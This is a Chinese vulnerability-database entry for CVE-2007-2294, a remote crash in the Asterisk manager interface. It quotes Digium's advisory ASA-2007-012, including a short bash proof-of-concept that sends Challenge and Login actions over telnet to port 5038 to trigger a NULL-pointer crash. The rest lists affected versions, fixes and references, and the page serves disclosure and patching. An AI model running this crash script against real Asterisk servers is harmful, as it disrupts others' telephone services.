Asterisk管理员接口远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1190804 漏洞类型 其他
发布时间 2007-04-25 更新时间 2007-08-28
CVE编号 CVE-2007-2294 CNNVD-ID CNNVD-200704-561
漏洞平台 N/A CVSS评分 7.8
|漏洞来源
https://www.securityfocus.com/bid/23649
https://cxsecurity.com/issue/WLB-2007040153
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-561
|漏洞详情
Asterisk是一款PBX系统的软件,运行在Linux系统上,支持使用SIP、IAX、H323协议进行IP通话。Asterisk的管理接口实现上存在远程拒绝服务漏洞,远程攻击者可能利用此漏洞导致程序崩溃。如果在manager.conf文件中配置了无需口令的管理员用户,则攻击者在试图使用该用户名和MD5认证进行连接时,Asterisk就会引用空指针并崩溃。
|漏洞EXP
>                Asterisk Project Security Advisory - ASA-2007-012
> 
>    +-----------------------------------------------------------------------
-+
>    |       Product       | Asterisk                                         |
>    |---------------------+-------------------------------------------------
-|
>    |       Summary       | Remote Crash Vulnerability in Manager Interface  |
>    |---------------------+-------------------------------------------------
-|
>    | Nature of Advisory  | Denial of Service                                |
>    |---------------------+-------------------------------------------------
-|
>    |   Susceptibility    | Remote Unauthenticated Sessions                  |
>    |---------------------+-------------------------------------------------
-|
>    |      Severity       | Moderate                                         |
>    |---------------------+-------------------------------------------------
-|
>    |   Exploits Known    | Yes                                              |
>    |---------------------+-------------------------------------------------
-|
>    |     Reported On     | April 24, 2007                                   |
>    |---------------------+-------------------------------------------------
-|
>    |     Reported By     | Digium Technical Support                         |
>    |---------------------+-------------------------------------------------
-|
>    |      Posted On      | April 24, 2007                                   |
>    |---------------------+-------------------------------------------------
-|
>    |   Last Updated On   | April 24, 2007                                   |
>    |---------------------+-------------------------------------------------
-|
>    |  Advisory Contact   | russell (at) digium (dot) com [email concealed]                               |
>    +-----------------------------------------------------------------------
-+
> 
>    +-----------------------------------------------------------------------
-+
>    | Description | The Asterisk Manager Interface has a remote crash        |
>    |             | vulnerability. If a manager user is configured in        |
>    |             | manager.conf without a password, and then a connection   |
>    |             | is made that attempts to use that username and MD5       |
>    |             | authentication, Asterisk will dereference a NULL pointer |
>    |             | and crash.                                               |
>    |             |                                                          |
>    |             | This example script shows how the crash can be           |
>    |             | triggered:                                               |
>    |             |                                                          |
>    |             | #!/bin/bash                                              |
>    |             |                                                          |
>    |             | function text1() {                                       |
>    |             |                                                          |
>    |             | cat <<- EOF                                              |
>    |             |                                                          |
>    |             | action: Challenge                                        |
>    |             |                                                          |
>    |             | actionid: 0#                                             |
>    |             |                                                          |
>    |             | authtype: MD5                                            |
>    |             |                                                          |
>    |             | EOF                                                      |
>    |             |                                                          |
>    |             | }                                                        |
>    |             |                                                          |
>    |             | function text2() {                                       |
>    |             |                                                          |
>    |             | cat <<- EOF                                              |
>    |             |                                                          |
>    |             | action: Login                                            |
>    |             |                                                          |
>    |             | actionid: 1#                                             |
>    |             |                                                          |
>    |             | key: textstringhere                                      |
>    |             |                                                          |
>    |             | username: testuser                                       |
>    |             |                                                          |
>    |             | authtype: MD5                                            |
>    |             |                                                          |
>    |             | EOF                                                      |
>    |             |                                                          |
>    |             | }                                                        |
>    |             |                                                          |
>    |             | (sleep 1; text1; sleep 1; text2 ) | telnet 127.0.0.1     |
>    |             | 5038                                                     |
>    +-----------------------------------------------------------------------
-+
> 
>    +-----------------------------------------------------------------------
-+
>    | Resolution | The manager interface is not enabled by default. If it is |
>    |            | enabled, the only way this crash can be exploited is if a |
>    |            | user exists in manager.conf without a password. Given the |
>    |            | conditions necessary for this problem to be exploited,    |
>    |            | the severity of this issue is marked as 'moderate'.       |
>    |            |                                                           |
>    |            | All users of the Asterisk manager interface in affected   |
>    |            | versions should ensure that there are no accounts in      |
>    |            | manager.conf. Alternatively, the issue can be avoided by  |
>    |            | completely disabling the manager interface.               |
>    |            |                                                           |
>    |            | Users of the manager interface are encouraged to update   |
>    |            | to the appropriate version of their Asterisk product      |
>    |            | listed in the 'Corrected In' section below.               |
>    +-----------------------------------------------------------------------
-+
> 
>    +-----------------------------------------------------------------------
-+
>    |                           Affected Versions                            |
>    |-----------------------------------------------------------------------
-|
>    |           Product            |   Release   |                           |
>    |                              |   Series    |                           |
>    |------------------------------+-------------+--------------------------
-|
>    |     Asterisk Open Source     |    1.0.x    | All versions              |
>    |------------------------------+-------------+--------------------------
-|
>    |     Asterisk Open Source     |    1.2.x    | All versions prior to     |
>    |                              |             | 1.2.18                    |
>    |------------------------------+-------------+--------------------------
-|
>    |     Asterisk Open Source     |    1.4.x    | All versions prior to     |
>    |                              |             | 1.4.3                     |
>    |------------------------------+-------------+--------------------------
-|
>    |  Asterisk Business Edition   |    A.x.x    | All versions              |
>    |------------------------------+-------------+--------------------------
-|
>    |  Asterisk Business Edition   |    B.x.x    | All versions up to and    |
>    |                              |             | including B.1.3           |
>    |------------------------------+-------------+--------------------------
-|
>    |         AsteriskNOW          | pre-release | All version up to and     |
>    |                              |             | including Beta5           |
>    |------------------------------+-------------+--------------------------
-|
>    | Asterisk Appliance Developer |    0.x.x    | All versions prior to     |
>    |             Kit              |             | 0.4.0                     |
>    +-----------------------------------------------------------------------
-+
> 
>    +-----------------------------------------------------------------------
-+
>    |                              Corrected In                              |
>    |-----------------------------------------------------------------------
-|
>    |      Product      |                      Release                       |
>    |-------------------+---------------------------------------------------
-|
>    |   Asterisk Open   |          1.2.18 and 1.4.3, available from          |
>    |      Source       |    ftp://ftp.digium.com/pub/telephony/asterisk     |
>    |-------------------+---------------------------------------------------
-|
>    | Asterisk Business |   B.1.3.3, available from the Asterisk Business    |
>    |      Edition      |  Edition user portal on http://www.digium.com or   |
>    |                   |            via Digium Technical Support            |
>    |-------------------+---------------------------------------------------
-|
>    |    AsteriskNOW    |             Beta6, when available from             |
>    |                   |   http://www.asterisknow.org/. Beta5 can use the   |
>    |                   |   system update feature in the appliance control   |
>    |                   |                       panel.                       |
>    |-------------------+---------------------------------------------------
-|
>    |     Asterisk      |               0.4.0, available from                |
>    |     Appliance     |      ftp://ftp.digium.com/pub/telephony/aadk/      |
>    |   Developer Kit   |                                                    |
>    +-----------------------------------------------------------------------
-+
> 
>    +-----------------------------------------------------------------------
-+
>    |        Links        |                                                  |
>    +-----------------------------------------------------------------------
-+
> 
>    +-----------------------------------------------------------------------
-+
>    | Asterisk Project Security Advisories are posted at                     |
>    | http://www.asterisk.org/security.                                      |
>    |                                                                        |
>    | This document may be superseded by later versions; if so, the latest   |
>    | version will be posted at                                              |
>    | http://www.asterisk.org/files/ASA-2007-012.pdf.                        |
>    +-----------------------------------------------------------------------
-+
> 
>                Asterisk Project Security Advisory - ASA-2007-012
>               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
>   Permission is hereby granted to distribute and publish this advisory in its
>                            original, unaltered form.
|受影响的产品
SuSE Linux 10.1 Debian Linux 3.1 sparc Debian Linux 3.1 s/390 Debian Linux 3.1 ppc Debian Linux 3.1 mipsel Debian Linux 3.1 mips Debian Linux 3.1 m68k
|参考资料

来源:SECUNIA
名称:24977
链接:http://secunia.com/advisories/24977
来源:SECTRACK
名称:1017955
链接:http://www.securitytracker.com/id?1017955
来源:BUGTRAQ
名称:20070425ASA-2007-012:RemoteCrashVulnerabilityinManagerInterface
链接:http://www.securityfocus.com/archive/1/archive/1/466911/100/0/threaded
来源:www.asterisk.org
链接:http://www.asterisk.org/files/ASA-2007-012.pdf
来源:XF
名称:asterisk-interface-dos(33886)
链接:http://xforce.iss.net/xforce/xfdb/33886
来源:BID
名称:23649
链接:http://www.securityfocus.com/bid/23649
来源:OSVDB
名称:35369
链接:http://www.osvdb.org/35369
来源:SUSE
名称:SUSE-SA:2007:034
链接:http://www.novell.com/linux/security/advisories/2007_34_asterisk.html
来源:VUPEN
名称:ADV-2007-1534
链接:http://www.frsirt.com/english/advisories/2007/1534
来源:DEBIAN
名称:DSA-1358
链接:http://www.debian.org/security/2007/dsa-1358
来源:SREASON
名称:2646
链接:http://securityreason.com/securityalert/2646
来源:SECUNIA
名称:25582
链接:http://secunia.com/advisories/25582